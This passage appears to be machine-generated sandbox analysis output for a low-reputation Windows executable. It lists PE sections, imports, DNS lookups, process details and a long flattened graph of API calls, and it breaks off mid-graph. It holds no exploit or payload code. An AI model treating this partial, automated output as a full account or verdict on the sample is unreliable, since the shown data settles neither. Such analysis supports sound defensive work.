      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3d85c | 0x120 | .rdata
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
      .text | 0x1000 | 0x32dbc | 0x32e00 | 59fca22eb14bf065790ccabf936fb764 | False | 0.5921807816339066 | data | 6.705384121865264 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata | 0x34000 | 0xb1d0 | 0xb200 | 3d7416119125f570d6c385b5ba208d7a | False | 0.46034497893258425 | data | 5.270635796862559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data | 0x40000 | 0x24750 | 0x1200 | edc39ed5cd62e969c2b4607a1a95cf98 | False | 0.4058159722222222 | data | 4.083550519415643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .didat | 0x65000 | 0x1a4 | 0x200 | 185ed7102f068a73891dd850643e3d14 | False | 0.46484375 | data | 3.50335535460232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc | 0x66000 | 0xdff8 | 0xe000 | 699399d7d2e63f9a36984a221fc02f75 | False | 0.6373465401785714 | data | 6.63871928699419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc | 0x74000 | 0x23dc | 0x2400 | 539b0c53eda4d1d9ffe2e69d5037d71f | False | 0.7864583333333334 | data | 6.678617573231213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
      PNG | 0x66650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
      PNG | 0x67198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
      RT_ICON | 0x68748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
      RT_ICON | 0x68cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
      RT_ICON | 0x69558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
      RT_ICON | 0x6a400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
      RT_ICON | 0x6a868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
      RT_ICON | 0x6b910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
      RT_ICON | 0x6deb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
      RT_DIALOG | 0x72588 | 0x286 | data | English | United States | 0.5092879256965944
      RT_DIALOG | 0x72358 | 0x13a | data | English | United States | 0.60828025477707
      RT_DIALOG | 0x72498 | 0xec | data | English | United States | 0.6991525423728814
      RT_DIALOG | 0x72228 | 0x12e | data | English | United States | 0.5927152317880795
      RT_DIALOG | 0x71ef0 | 0x338 | data | English | United States | 0.45145631067961167
      RT_DIALOG | 0x71c98 | 0x252 | data | English | United States | 0.5757575757575758
      RT_STRING | 0x72f68 | 0x1e2 | data | English | United States | 0.3900414937759336
      RT_STRING | 0x73150 | 0x1cc | data | English | United States | 0.4282608695652174
      RT_STRING | 0x73320 | 0x1b8 | data | English | United States | 0.45681818181818185
      RT_STRING | 0x734d8 | 0x146 | data | English | United States | 0.5153374233128835
      RT_STRING | 0x73620 | 0x46c | data | English | United States | 0.3454063604240283
      RT_STRING | 0x73a90 | 0x166 | data | English | United States | 0.49162011173184356
      RT_STRING | 0x73bf8 | 0x152 | data | English | United States | 0.5059171597633136
      RT_STRING | 0x73d50 | 0x10a | data | English | United States | 0.49624060150375937
      RT_STRING | 0x73e60 | 0xbc | data | English | United States | 0.6329787234042553
      RT_STRING | 0x73f20 | 0xd6 | data | English | United States | 0.5747663551401869
      RT_GROUP_ICON | 0x71c30 | 0x68 | data | English | United States | 0.7019230769230769
      RT_MANIFEST | 0x72810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
      DLL | Import
      KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
      OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
      gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
      Language of compilation system | Country where language is spoken | Map
      English | United States |
      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Sep 30, 2024 15:31:52.755042076 CEST | 53 | 55415 | 162.159.36.2 | 192.168.2.8
      Sep 30, 2024 15:31:53.249387026 CEST | 54696 | 53 | 192.168.2.8 | 1.1.1.1
      Sep 30, 2024 15:31:53.258507013 CEST | 53 | 54696 | 1.1.1.1 | 192.168.2.8
      Sep 30, 2024 15:31:54.946047068 CEST | 53264 | 53 | 192.168.2.8 | 1.1.1.1
      Sep 30, 2024 15:31:54.953948975 CEST | 53 | 53264 | 1.1.1.1 | 192.168.2.8
      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
      Sep 30, 2024 15:31:53.249387026 CEST | 192.168.2.8 | 1.1.1.1 | 0x4122 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
      Sep 30, 2024 15:31:54.946047068 CEST | 192.168.2.8 | 1.1.1.1 | 0xf3ab | Standard query (0) | 183.59.114.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
      Sep 30, 2024 15:31:53.258507013 CEST | 1.1.1.1 | 192.168.2.8 | 0x4122 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
      Sep 30, 2024 15:31:54.953948975 CEST | 1.1.1.1 | 192.168.2.8 | 0xf3ab | Name error (3) | 183.59.114.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false


      Target ID: 1
      Start time: 09:31:20
      Start date: 30/09/2024
      Path: C:\Users\user\Desktop\HSZXPMB7kS.exe
      Wow64 process (32bit): true
      Commandline: "C:\Users\user\Desktop\HSZXPMB7kS.exe"
      Imagebase: 0x120000
      File size: 334'347 bytes
      MD5 hash: D6F5CA5DA79A7EB267670CC0E6F5D590
      Has elevated privileges: true
      Has administrator privileges: true
      Programmed in: C, C++ or other language
      Reputation: low
      Has exited: true


        Execution Graph

        Execution Coverage:9.3%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:9.9%
        Total number of Nodes:1551
        Total number of Limit Nodes:43
API calls 24990->24991 24992 14bdd4 24990->24992 24993 14bdd0 24990->24993 24991->24990 24995 14be00 DeleteCriticalSection 24992->24995 24995->24993 26207 140eff 9 API calls 2 library calls 26166 13bdd0 74 API calls 26167 1505d1 21 API calls __vsnwprintf_l 26208 1473d0 QueryPerformanceFrequency QueryPerformanceCounter 25014 12acd4 25015 12acde 25014->25015 25016 12ae2c SetFilePointer 25015->25016 25019 12acf4 25015->25019 25020 12ae05 25015->25020 25021 12aa7a 25015->25021 25017 12ae49 GetLastError 25016->25017 25016->25019 25017->25019 25020->25016 25022 12aa93 25021->25022 25024 12b110 80 API calls 25022->25024 25023 12aac5 25023->25020 25024->25023 25029 13c9c0 25030 13c9ca __EH_prolog 25029->25030 25195 1212f6 25030->25195 25033 13d0fb 25272 13e7de 25033->25272 25034 13ca0a 25036 13ca7b 25034->25036 25037 13ca18 25034->25037 25111 13ca21 25034->25111 25043 13cb0e GetDlgItemTextW 25036->25043 25047 13ca91 25036->25047 25039 13ca58 25037->25039 25040 13ca1c 25037->25040 25050 13cb3f KiUserCallbackDispatcher 25039->25050 25039->25111 25049 12f937 53 API calls 25040->25049 25040->25111 25041 13d116 SendMessageW 25042 13d124 25041->25042 25045 13d13e GetDlgItem SendMessageW 25042->25045 25046 13d12d SendDlgItemMessageW 25042->25046 25043->25039 25044 13cb4b 25043->25044 25051 13cb60 GetDlgItem 25044->25051 25193 13cb54 25044->25193 25290 13b64d GetCurrentDirectoryW 25045->25290 25046->25045 25048 12f937 53 API calls 25047->25048 25056 13caae SetDlgItemTextW 25048->25056 25057 13ca3b 25049->25057 25050->25111 25053 13cb97 SetFocus 25051->25053 25054 13cb74 SendMessageW SendMessageW 25051->25054 25060 13cba7 25053->25060 25073 13cbb3 25053->25073 25054->25053 25055 13d16e GetDlgItem 25058 13d191 SetWindowTextW 25055->25058 25059 13d18b 25055->25059 25061 13cab9 25056->25061 25310 12122f SHGetMalloc 25057->25310 25291 13bbb0 GetClassNameW 25058->25291 25059->25058 25065 12f937 53 API calls 25060->25065 25067 13cac6 GetMessageW 25061->25067 25061->25111 25063 13d041 
25066 12f937 53 API calls 25063->25066 25069 13cbb1 25065->25069 25070 13d051 SetDlgItemTextW 25066->25070 25071 13cadd IsDialogMessageW 25067->25071 25067->25111 25206 13e607 25069->25206 25075 13d065 25070->25075 25071->25061 25076 13caec TranslateMessage DispatchMessageW 25071->25076 25080 12f937 53 API calls 25073->25080 25074 13d3e8 SetDlgItemTextW 25074->25111 25081 12f937 53 API calls 25075->25081 25076->25061 25079 13cc0d 25084 13cc41 25079->25084 25311 12b4c1 25079->25311 25083 13cbea 25080->25083 25119 13d088 _wcslen 25081->25119 25082 13d1dc 25086 13d20c 25082->25086 25090 12f937 53 API calls 25082->25090 25087 124a20 _swprintf 51 API calls 25083->25087 25217 12b341 25084->25217 25085 13d872 98 API calls 25085->25082 25091 13d872 98 API calls 25086->25091 25131 13d2c4 25086->25131 25087->25069 25095 13d1ef SetDlgItemTextW 25090->25095 25096 13d227 25091->25096 25093 13d374 25098 13d380 EnableWindow 25093->25098 25099 13d389 25093->25099 25103 12f937 53 API calls 25095->25103 25122 13d252 25096->25122 25321 13aee5 ShowWindow 25096->25321 25097 13cc3b 25314 13beef CreateDirectoryW LocalFree GetCurrentProcess GetLastError 25097->25314 25098->25099 25108 13d3a6 25099->25108 25340 1212b3 GetDlgItem EnableWindow 25099->25340 25100 13d0d9 25106 12f937 53 API calls 25100->25106 25101 13cc5a GetLastError 25102 13cc65 25101->25102 25223 13bc09 SetCurrentDirectoryW 25102->25223 25105 13d203 SetDlgItemTextW 25103->25105 25105->25086 25106->25111 25110 13d3cd 25108->25110 25120 13d3c5 SendMessageW 25108->25120 25109 13cc79 25114 13cc90 25109->25114 25115 13cc82 GetLastError 25109->25115 25110->25111 25121 12f937 53 API calls 25110->25121 25112 13d2b7 25116 13d872 98 API calls 25112->25116 25127 13cd16 25114->25127 25129 13cca0 GetTickCount 25114->25129 25168 13cd07 25114->25168 25115->25114 25116->25131 25118 13d39c 25341 1212b3 GetDlgItem EnableWindow 25118->25341 25119->25100 25124 12f937 53 API calls 25119->25124 25120->25110 25130 13ca42 25121->25130 25122->25112 
25142 13d872 98 API calls 25122->25142 25125 13d0bc 25124->25125 25132 124a20 _swprintf 51 API calls 25125->25132 25126 13cf42 25232 1212d1 GetDlgItem ShowWindow 25126->25232 25133 13cee7 25127->25133 25134 13cd2f GetModuleFileNameW 25127->25134 25135 13cedd 25127->25135 25128 13d355 25137 13aee5 40 API calls 25128->25137 25138 124a20 _swprintf 51 API calls 25129->25138 25130->25074 25130->25111 25131->25093 25131->25128 25139 12f937 53 API calls 25131->25139 25132->25100 25141 12f937 53 API calls 25133->25141 25315 1305e6 83 API calls 25134->25315 25135->25039 25135->25133 25137->25093 25144 13ccbd 25138->25144 25139->25131 25148 13cef1 25141->25148 25145 13d28c 25142->25145 25143 13cf52 25233 1212d1 GetDlgItem ShowWindow 25143->25233 25224 12a8ce 25144->25224 25145->25112 25151 13d295 DialogBoxParamW 25145->25151 25146 13cd57 25149 124a20 _swprintf 51 API calls 25146->25149 25150 124a20 _swprintf 51 API calls 25148->25150 25153 13cd79 CreateFileMappingW 25149->25153 25156 13cf0f 25150->25156 25151->25039 25151->25112 25152 13cf5c 25154 12f937 53 API calls 25152->25154 25157 13cdd7 GetCommandLineW 25153->25157 25186 13ce4e __InternalCxxFrameHandler 25153->25186 25158 13cf66 SetDlgItemTextW 25154->25158 25166 12f937 53 API calls 25156->25166 25160 13cde8 25157->25160 25234 1212d1 GetDlgItem ShowWindow 25158->25234 25159 13cce3 25162 13ccea GetLastError 25159->25162 25163 13ccf5 25159->25163 25316 13c605 SHGetMalloc 25160->25316 25162->25163 25164 12a801 81 API calls 25163->25164 25164->25168 25169 13cf29 25166->25169 25167 13cf78 SetDlgItemTextW GetDlgItem 25170 13cf95 GetWindowLongW SetWindowLongW 25167->25170 25171 13cfad 25167->25171 25168->25126 25168->25127 25170->25171 25235 13d872 25171->25235 25172 13ce04 25317 13c605 SHGetMalloc 25172->25317 25176 13ce10 25318 13c605 SHGetMalloc 25176->25318 25177 13d872 98 API calls 25179 13cfc9 25177->25179 25260 13eb92 25179->25260 25180 13ce1c 25319 130695 83 API calls 25180->25319 25181 13ceb7 25181->25135 25188 
13cecd UnmapViewOfFile CloseHandle 25181->25188 25185 13ce2d MapViewOfFile 25185->25186 25186->25181 25189 13cea3 Sleep 25186->25189 25187 13d872 98 API calls 25192 13cfef 25187->25192 25188->25135 25189->25181 25189->25186 25190 13d018 25320 1212b3 GetDlgItem EnableWindow 25190->25320 25192->25190 25194 13d872 98 API calls 25192->25194 25193->25039 25193->25063 25194->25190 25196 121358 25195->25196 25197 1212ff 25195->25197 25343 12f5e1 GetWindowLongW SetWindowLongW 25196->25343 25199 121365 25197->25199 25342 12f608 62 API calls 2 library calls 25197->25342 25199->25033 25199->25034 25199->25111 25201 121321 25201->25199 25202 121327 GetParent 25201->25202 25202->25199 25203 121334 GetDlgItem 25202->25203 25203->25199 25204 121344 25203->25204 25204->25199 25205 12134a SetWindowTextW 25204->25205 25205->25199 25344 13c748 PeekMessageW 25206->25344 25209 13e635 25349 13a235 25209->25349 25210 13e669 SendMessageW SendMessageW 25212 13e6a5 25210->25212 25213 13e6c4 SendMessageW SendMessageW SendMessageW 25210->25213 25212->25213 25215 13e6f7 SendMessageW 25213->25215 25216 13e71a SendMessageW 25213->25216 25215->25216 25216->25079 25218 12b34b 25217->25218 25219 12b405 25218->25219 25220 12b3dc 25218->25220 25352 12b542 25218->25352 25219->25101 25219->25102 25220->25219 25221 12b542 8 API calls 25220->25221 25221->25219 25223->25109 25225 12a8d8 25224->25225 25226 12a935 CreateFileW 25225->25226 25227 12a929 25225->25227 25226->25227 25228 12a97f 25227->25228 25229 12cf32 GetCurrentDirectoryW 25227->25229 25228->25159 25230 12a964 25229->25230 25230->25228 25231 12a968 CreateFileW 25230->25231 25231->25228 25232->25143 25233->25152 25234->25167 25236 13d87c __EH_prolog 25235->25236 25237 13cfbb 25236->25237 25373 13c4f4 ExpandEnvironmentStringsW 25236->25373 25237->25177 25241 13db9a SetWindowTextW 25246 13d8b3 _wcslen _wcsrchr 25241->25246 25246->25237 25246->25241 25247 13d988 SetFileAttributesW 25246->25247 25249 13d9a2 __cftof _wcslen 25246->25249 25374 133306 
CompareStringW 25246->25374 25375 13b64d GetCurrentDirectoryW 25246->25375 25377 12b9ca 6 API calls 25246->25377 25378 12b953 FindClose 25246->25378 25379 13c66e 77 API calls 2 library calls 25246->25379 25380 14520e 25246->25380 25393 13c4f4 ExpandEnvironmentStringsW 25246->25393 25248 13da42 GetFileAttributesW 25247->25248 25247->25249 25248->25246 25251 13da54 DeleteFileW 25248->25251 25249->25246 25249->25248 25253 13dd64 GetDlgItem SetWindowTextW SendMessageW 25249->25253 25255 13dda4 SendMessageW 25249->25255 25376 12cdc0 51 API calls 2 library calls 25249->25376 25251->25246 25257 13da65 25251->25257 25253->25249 25254 124a20 _swprintf 51 API calls 25256 13da85 GetFileAttributesW 25254->25256 25255->25246 25256->25257 25258 13da9a MoveFileW 25256->25258 25257->25254 25258->25246 25259 13dab2 MoveFileExW 25258->25259 25259->25246 25261 13eb9c __EH_prolog 25260->25261 25405 13197c 25261->25405 25263 13ebcd 25409 1264ed 25263->25409 25265 13ebeb 25413 128823 25265->25413 25269 13ec3e 25431 12890a 25269->25431 25271 13cfda 25271->25187 25273 13e7e8 25272->25273 25274 13b5c6 4 API calls 25273->25274 25275 13e7ed 25274->25275 25276 13d101 25275->25276 25277 13e7f5 GetWindow 25275->25277 25276->25041 25276->25042 25277->25276 25283 13e815 25277->25283 25278 13e822 GetClassNameW 25929 133306 CompareStringW 25278->25929 25280 13e846 GetWindowLongW 25281 13e8aa GetWindow 25280->25281 25282 13e856 SendMessageW 25280->25282 25281->25276 25281->25283 25282->25281 25284 13e86c GetObjectW 25282->25284 25283->25276 25283->25278 25283->25280 25283->25281 25930 13b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25284->25930 25286 13e883 25931 13b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25286->25931 25932 13b80c 9 API calls 25286->25932 25289 13e894 SendMessageW DeleteObject 25289->25281 25290->25055 25292 13bbd1 25291->25292 25293 13bbf6 25291->25293 25933 133306 CompareStringW 25292->25933 25297 13c207 25293->25297 25295 13bbe4 25295->25293 25296 13bbe8 FindWindowExW 
25295->25296 25296->25293 25298 13c211 __EH_prolog 25297->25298 25299 1213f8 43 API calls 25298->25299 25300 13c233 25299->25300 25934 122083 25300->25934 25303 13c24d 25305 121641 87 API calls 25303->25305 25304 13c25c 25306 121a7e 143 API calls 25304->25306 25308 13c258 25305->25308 25309 13c27b __InternalCxxFrameHandler ___std_exception_copy 25306->25309 25307 121641 87 API calls 25307->25308 25308->25082 25308->25085 25309->25307 25310->25130 25942 12b4d3 25311->25942 25314->25084 25315->25146 25316->25172 25317->25176 25318->25180 25319->25185 25320->25193 25950 13ac14 LoadCursorW RegisterClassExW 25321->25950 25323 13af25 25326 13af3d GetWindowRect GetParent MapWindowPoints 25323->25326 25952 148a08 26 API calls ___std_exception_copy 25323->25952 25324 13af0f 25324->25323 25951 148a08 26 API calls ___std_exception_copy 25324->25951 25329 13af80 GetParent CreateWindowExW 25326->25329 25330 13af77 DestroyWindow 25326->25330 25331 13afcb 25329->25331 25332 13b008 25329->25332 25330->25329 25331->25332 25335 13afd0 25331->25335 25333 13b01e 25332->25333 25334 13b00c ShowWindow UpdateWindow 25332->25334 25333->25122 25334->25333 25335->25333 25953 13ad0e CompareStringW _wcslen ___std_exception_copy 25335->25953 25337 13afe8 25337->25333 25338 13afee ShowWindow SetWindowTextW 25337->25338 25339 13b005 25338->25339 25339->25333 25340->25118 25341->25108 25342->25201 25343->25199 25345 13c763 KiUserCallbackDispatcher 25344->25345 25346 13c79c GetDlgItem 25344->25346 25347 13c779 IsDialogMessageW 25345->25347 25348 13c788 TranslateMessage DispatchMessageW 25345->25348 25346->25209 25346->25210 25347->25346 25347->25348 25348->25346 25350 13a24b ShowWindow SendMessageW SendMessageW 25349->25350 25351 13a23e DestroyWindow 25349->25351 25350->25210 25351->25350 25354 12b54f 25352->25354 25353 12b573 25356 12b4c1 3 API calls 25353->25356 25354->25353 25355 12b566 CreateDirectoryW 25354->25355 25355->25353 25357 12b5a6 25355->25357 25358 12b579 25356->25358 25360 12b5b5 
25357->25360 25365 12b8e6 25357->25365 25359 12b5b9 GetLastError 25358->25359 25361 12cf32 GetCurrentDirectoryW 25358->25361 25359->25360 25360->25218 25363 12b58f 25361->25363 25363->25359 25364 12b593 CreateDirectoryW 25363->25364 25364->25357 25364->25359 25366 13ffc0 25365->25366 25367 12b8f3 SetFileAttributesW 25366->25367 25368 12b936 25367->25368 25369 12b909 25367->25369 25368->25360 25370 12cf32 GetCurrentDirectoryW 25369->25370 25371 12b91d 25370->25371 25371->25368 25372 12b921 SetFileAttributesW 25371->25372 25372->25368 25373->25246 25374->25246 25375->25246 25376->25249 25377->25246 25378->25246 25379->25246 25381 14a694 25380->25381 25382 14a6a1 25381->25382 25383 14a6ac 25381->25383 25394 14a7ee 25382->25394 25384 14a6b4 25383->25384 25391 14a6bd _free 25383->25391 25386 14a65a _free 20 API calls 25384->25386 25389 14a6a9 25386->25389 25387 14a6e7 HeapReAlloc 25387->25389 25387->25391 25388 14a6c2 25401 14a7db 20 API calls _free 25388->25401 25389->25246 25391->25387 25391->25388 25402 148e4c 7 API calls 2 library calls 25391->25402 25393->25246 25395 14a82c 25394->25395 25399 14a7fc _free 25394->25399 25404 14a7db 20 API calls _free 25395->25404 25396 14a817 RtlAllocateHeap 25398 14a82a 25396->25398 25396->25399 25398->25389 25399->25395 25399->25396 25403 148e4c 7 API calls 2 library calls 25399->25403 25401->25389 25402->25391 25403->25399 25404->25398 25406 131989 _wcslen 25405->25406 25440 121895 25406->25440 25408 1319a1 25408->25263 25410 13197c _wcslen 25409->25410 25411 121895 79 API calls 25410->25411 25412 1319a1 25411->25412 25412->25265 25414 12882d __EH_prolog 25413->25414 25453 12e298 25414->25453 25416 128855 25417 13feae 27 API calls 25416->25417 25418 128899 __cftof 25417->25418 25419 13feae 27 API calls 25418->25419 25421 1288c0 25419->25421 25463 135c54 25421->25463 25423 128a38 25426 128a42 25423->25426 25424 128ab5 25425 128b1a 25424->25425 25484 1290a2 25424->25484 25429 128b5c 25425->25429 25512 121397 75 API calls 
25425->25512 25426->25424 25506 12b966 25426->25506 25429->25269 25916 12a41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 25431->25916 25433 12892b 25435 12893c Concurrency::cancel_current_task 25433->25435 25917 133536 25433->25917 25436 122111 26 API calls 25435->25436 25437 128963 25436->25437 25438 12e339 87 API calls 25437->25438 25439 12896b 25438->25439 25439->25271 25441 1218a7 25440->25441 25448 1218ff 25440->25448 25442 1218d0 25441->25442 25450 1276e9 77 API calls __vswprintf_c_l 25441->25450 25444 14520e 22 API calls 25442->25444 25447 1218f0 25444->25447 25445 1218c6 25451 12775a 76 API calls 25445->25451 25447->25448 25452 12775a 76 API calls 25447->25452 25448->25408 25450->25445 25451->25442 25452->25448 25454 12e2a2 __EH_prolog 25453->25454 25455 13feae 27 API calls 25454->25455 25456 12e2e5 25455->25456 25457 12e2f8 25456->25457 25458 126891 41 API calls 25456->25458 25459 13feae 27 API calls 25457->25459 25458->25457 25460 12e309 25459->25460 25461 12e31c 25460->25461 25469 126891 25460->25469 25461->25416 25464 135c5e __EH_prolog 25463->25464 25465 13feae 27 API calls 25464->25465 25466 135c7a 25465->25466 25467 1288f2 25466->25467 25483 13215f 81 API calls 25466->25483 25467->25423 25470 12689b __EH_prolog 25469->25470 25475 140013 25470->25475 25472 1268b7 25473 140013 41 API calls 25472->25473 25474 1268d9 __cftof 25473->25474 25474->25461 25477 14001f ___scrt_is_nonwritable_in_current_image 25475->25477 25476 14004a 25476->25472 25477->25476 25479 126920 25477->25479 25480 12692a __EH_prolog 25479->25480 25481 1304e5 41 API calls 25480->25481 25482 126936 25481->25482 25482->25477 25483->25467 25485 1290ac __EH_prolog 25484->25485 25513 1213f8 25485->25513 25487 1290c8 25488 1290d9 25487->25488 25677 12b1d2 25487->25677 25492 129110 25488->25492 25525 121ad3 25488->25525 25669 121641 25492->25669 25494 12910c 25494->25492 25544 122032 25494->25544 25496 1291b2 25548 12924e 25496->25548 25499 129211 25499->25492 25556 124264 
25499->25556 25568 1292c6 25499->25568 25504 12b966 7 API calls 25505 129139 25504->25505 25505->25496 25505->25504 25681 12d4d2 CompareStringW _wcslen 25505->25681 25507 12b97b 25506->25507 25511 12b9a9 25507->25511 25905 12ba94 25507->25905 25509 12b98b 25510 12b990 FindClose 25509->25510 25509->25511 25510->25511 25511->25426 25512->25429 25514 1213fd __EH_prolog 25513->25514 25515 126891 41 API calls 25514->25515 25516 121428 25515->25516 25517 12e298 41 API calls 25516->25517 25518 121437 25517->25518 25519 13feae 27 API calls 25518->25519 25524 1214ab 25518->25524 25520 121498 25519->25520 25522 12644d 43 API calls 25520->25522 25520->25524 25522->25524 25523 121533 __cftof 25523->25487 25682 12c1f7 25524->25682 25526 121add __EH_prolog 25525->25526 25538 121b30 25526->25538 25540 121c63 25526->25540 25700 1213d9 25526->25700 25529 121c9e 25703 121397 75 API calls 25529->25703 25531 124264 116 API calls 25534 121ce9 25531->25534 25532 121cab 25532->25531 25532->25540 25533 121d31 25537 121d64 25533->25537 25533->25540 25704 121397 75 API calls 25533->25704 25534->25533 25536 124264 116 API calls 25534->25536 25536->25534 25537->25540 25543 12b110 80 API calls 25537->25543 25538->25529 25538->25532 25538->25540 25539 124264 116 API calls 25541 121db5 25539->25541 25540->25494 25541->25539 25541->25540 25542 12b110 80 API calls 25542->25538 25543->25541 25545 122037 __EH_prolog 25544->25545 25547 122068 25545->25547 25718 121a7e 25545->25718 25547->25505 25723 12e395 25548->25723 25550 12925e 25727 1326f1 GetSystemTime SystemTimeToFileTime 25550->25727 25552 1291cc 25552->25499 25553 132ea4 25552->25553 25728 13ef9b 25553->25728 25557 124270 25556->25557 25558 124274 25556->25558 25557->25499 25567 12b110 80 API calls 25558->25567 25559 124286 25560 1242af 25559->25560 25563 1242a1 25559->25563 25737 122eb6 116 API calls 3 library calls 25560->25737 25562 1242e1 25562->25499 25563->25562 25736 12395a 104 API calls 3 library calls 25563->25736 25565 1242ad 
25565->25562 25738 122544 75 API calls 25565->25738 25567->25559 25569 1292d0 __EH_prolog 25568->25569 25572 12930e 25569->25572 25598 12973d Concurrency::cancel_current_task 25569->25598 25779 139c9d 118 API calls 25569->25779 25571 12a18d 25573 12a192 25571->25573 25574 12a1c5 25571->25574 25572->25571 25576 12932f 25572->25576 25572->25598 25573->25598 25810 128675 167 API calls 25573->25810 25574->25598 25811 139c9d 118 API calls 25574->25811 25576->25598 25739 1266df 25576->25739 25579 129545 25586 129669 25579->25586 25579->25598 25782 128f6b 39 API calls 25579->25782 25581 129405 25581->25579 25780 12b5d6 57 API calls 3 library calls 25581->25780 25585 1295ac 25781 148a08 26 API calls ___std_exception_copy 25585->25781 25588 12b966 7 API calls 25586->25588 25590 1296db 25586->25590 25588->25590 25589 129935 25789 12e4a9 97 API calls 25589->25789 25745 1289c8 25590->25745 25593 12976c 25603 1297c5 25593->25603 25783 124727 41 API calls 2 library calls 25593->25783 25596 129990 25597 129a3a 25596->25597 25605 1299bb 25596->25605 25602 129a8c 25597->25602 25612 129a45 